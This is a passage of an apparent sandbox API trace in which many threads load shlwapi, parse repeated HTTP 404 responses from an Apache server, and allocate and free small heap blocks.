(HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9b8 [0233.196] GetProcessHeap () returned 0x6a0000 [0233.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9b8 | out: hHeap=0x6a0000) returned 1 [0233.196] GetProcessHeap () returned 0x6a0000 [0233.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 Thread: id = 320 os_tid = 0x1464 [0233.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.570] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0233.570] GetProcessHeap () returned 0x6a0000 [0233.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9b8 [0233.570] GetProcessHeap () returned 0x6a0000 [0233.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9b8 | out: hHeap=0x6a0000) returned 1 [0233.570] GetProcessHeap () returned 0x6a0000 [0233.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 Thread: id = 321 os_tid = 0x1468 [0233.681] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.709] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0233.709] GetProcessHeap () returned 0x6a0000 [0233.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0233.709] GetProcessHeap () returned 0x6a0000 [0233.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0233.709] GetProcessHeap () returned 0x6a0000 [0233.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 Thread: id = 322 os_tid = 0x146c [0233.966] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0233.967] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0233.967] GetProcessHeap () returned 0x6a0000 [0233.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0233.967] GetProcessHeap () returned 0x6a0000 [0233.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0233.967] GetProcessHeap () returned 0x6a0000 [0233.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 323 os_tid = 0x1470 [0234.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.198] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0234.199] GetProcessHeap () returned 0x6a0000 [0234.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0234.199] GetProcessHeap () returned 0x6a0000 [0234.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0234.199] GetProcessHeap () returned 0x6a0000 [0234.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 324 os_tid = 0x1474 [0234.585] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.585] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0234.585] GetProcessHeap () returned 0x6a0000 [0234.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7f0 [0234.585] GetProcessHeap () returned 0x6a0000 [0234.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7f0 | out: hHeap=0x6a0000) returned 1 [0234.586] GetProcessHeap () returned 0x6a0000 [0234.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 325 os_tid = 0x1478 [0234.824] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.825] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0234.825] GetProcessHeap () returned 0x6a0000 [0234.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0234.825] GetProcessHeap () returned 0x6a0000 [0234.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0234.825] GetProcessHeap () returned 0x6a0000 [0234.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 326 os_tid = 0x147c [0234.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0234.999] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0234.999] GetProcessHeap () returned 0x6a0000 [0234.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0234.999] GetProcessHeap () returned 0x6a0000 [0234.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0234.999] GetProcessHeap () returned 0x6a0000 [0235.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 327 os_tid = 0x1480 [0235.234] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.235] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0235.235] GetProcessHeap () returned 0x6a0000 [0235.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0235.235] GetProcessHeap () returned 0x6a0000 [0235.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0235.235] GetProcessHeap () returned 0x6a0000 [0235.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 328 os_tid = 0x1484 [0235.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.447] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0235.447] GetProcessHeap () returned 0x6a0000 [0235.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0235.447] GetProcessHeap () returned 0x6a0000 [0235.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0235.447] GetProcessHeap () returned 0x6a0000 [0235.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 329 os_tid = 0x1488 [0235.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.635] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0235.635] GetProcessHeap () returned 0x6a0000 [0235.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0235.635] GetProcessHeap () returned 0x6a0000 [0235.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0235.636] GetProcessHeap () returned 0x6a0000 [0235.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 330 os_tid = 0x148c [0235.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0235.923] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0235.923] GetProcessHeap () returned 0x6a0000 [0235.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0235.923] GetProcessHeap () returned 0x6a0000 [0235.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0235.924] GetProcessHeap () returned 0x6a0000 [0235.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 331 os_tid = 0x1490 [0236.109] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.109] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0236.109] GetProcessHeap () returned 0x6a0000 [0236.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0236.109] GetProcessHeap () returned 0x6a0000 [0236.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0236.109] GetProcessHeap () returned 0x6a0000 [0236.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 332 os_tid = 0x1494 [0236.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.305] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0236.305] GetProcessHeap () returned 0x6a0000 [0236.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0236.305] GetProcessHeap () returned 0x6a0000 [0236.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0236.305] GetProcessHeap () returned 0x6a0000 [0236.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 333 os_tid = 0x1498 [0236.513] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.513] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0236.513] GetProcessHeap () returned 0x6a0000 [0236.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0236.513] GetProcessHeap () returned 0x6a0000 [0236.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0236.513] GetProcessHeap () returned 0x6a0000 [0236.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 334 os_tid = 0x149c [0236.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.691] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0236.691] GetProcessHeap () returned 0x6a0000 [0236.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0236.691] GetProcessHeap () returned 0x6a0000 [0236.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0236.691] GetProcessHeap () returned 0x6a0000 [0236.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 335 os_tid = 0x14a0 [0236.992] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0236.993] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:23 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0236.993] GetProcessHeap () returned 0x6a0000 [0236.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0236.993] GetProcessHeap () returned 0x6a0000 [0236.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0236.993] GetProcessHeap () returned 0x6a0000 [0236.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 336 os_tid = 0x14a4 [0237.192] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.192] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:24 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0237.192] GetProcessHeap () returned 0x6a0000 [0237.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7f0 [0237.192] GetProcessHeap () returned 0x6a0000 [0237.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7f0 | out: hHeap=0x6a0000) returned 1 [0237.193] GetProcessHeap () returned 0x6a0000 [0237.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 337 os_tid = 0x14a8 [0237.562] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.562] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:24 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0237.563] GetProcessHeap () returned 0x6a0000 [0237.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea48 [0237.563] GetProcessHeap () returned 0x6a0000 [0237.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea48 | out: hHeap=0x6a0000) returned 1 [0237.563] GetProcessHeap () returned 0x6a0000 [0237.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 338 os_tid = 0x14ac [0237.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.924] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:24 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0237.924] GetProcessHeap () returned 0x6a0000 [0237.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0237.924] GetProcessHeap () returned 0x6a0000 [0237.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0237.924] GetProcessHeap () returned 0x6a0000 [0237.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 339 os_tid = 0x14b0 [0238.205] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.207] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:25 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0238.207] GetProcessHeap () returned 0x6a0000 [0238.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0238.207] GetProcessHeap () returned 0x6a0000 [0238.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0238.207] GetProcessHeap () returned 0x6a0000 [0238.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 340 os_tid = 0x14b4 [0238.453] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.453] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:25 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0238.453] GetProcessHeap () returned 0x6a0000 [0238.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea78 [0238.453] GetProcessHeap () returned 0x6a0000 [0238.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea78 | out: hHeap=0x6a0000) returned 1 [0238.454] GetProcessHeap () returned 0x6a0000 [0238.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 341 os_tid = 0x14b8 [0238.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.644] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:25 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0238.644] GetProcessHeap () returned 0x6a0000 [0238.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0238.644] GetProcessHeap () returned 0x6a0000 [0238.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0238.644] GetProcessHeap () returned 0x6a0000 [0238.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 342 os_tid = 0x14bc [0238.869] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.869] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:25 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0238.869] GetProcessHeap () returned 0x6a0000 [0238.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0238.869] GetProcessHeap () returned 0x6a0000 [0238.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0238.869] GetProcessHeap () returned 0x6a0000 [0238.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 343 os_tid = 0x14c0 [0239.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.103] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0239.103] GetProcessHeap () returned 0x6a0000 [0239.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0239.103] GetProcessHeap () returned 0x6a0000 [0239.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0239.103] GetProcessHeap () returned 0x6a0000 [0239.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 344 os_tid = 0x14c4 [0239.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.288] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0239.288] GetProcessHeap () returned 0x6a0000 [0239.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0239.288] GetProcessHeap () returned 0x6a0000 [0239.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0239.288] GetProcessHeap () returned 0x6a0000 [0239.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 345 os_tid = 0x14c8 [0239.477] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.477] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0239.477] GetProcessHeap () returned 0x6a0000 [0239.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0239.478] GetProcessHeap () returned 0x6a0000 [0239.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0239.478] GetProcessHeap () returned 0x6a0000 [0239.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 346 os_tid = 0x14cc [0239.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.781] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0239.781] GetProcessHeap () returned 0x6a0000 [0239.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0239.781] GetProcessHeap () returned 0x6a0000 [0239.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0239.781] GetProcessHeap () returned 0x6a0000 [0239.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 347 os_tid = 0x14d0 [0239.942] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0239.942] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:26 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0239.942] GetProcessHeap () returned 0x6a0000 [0239.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0239.942] GetProcessHeap () returned 0x6a0000 [0239.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0239.942] GetProcessHeap () returned 0x6a0000 [0239.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 348 os_tid = 0x14d4 [0240.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0240.545] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0240.545] GetProcessHeap () returned 0x6a0000 [0240.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0240.546] GetProcessHeap () returned 0x6a0000 [0240.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0240.546] GetProcessHeap () returned 0x6a0000 [0240.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 Thread: id = 349 os_tid = 0x14d8 [0240.825] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0240.826] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:27 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0240.826] GetProcessHeap () returned 0x6a0000 [0240.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0240.826] GetProcessHeap () returned 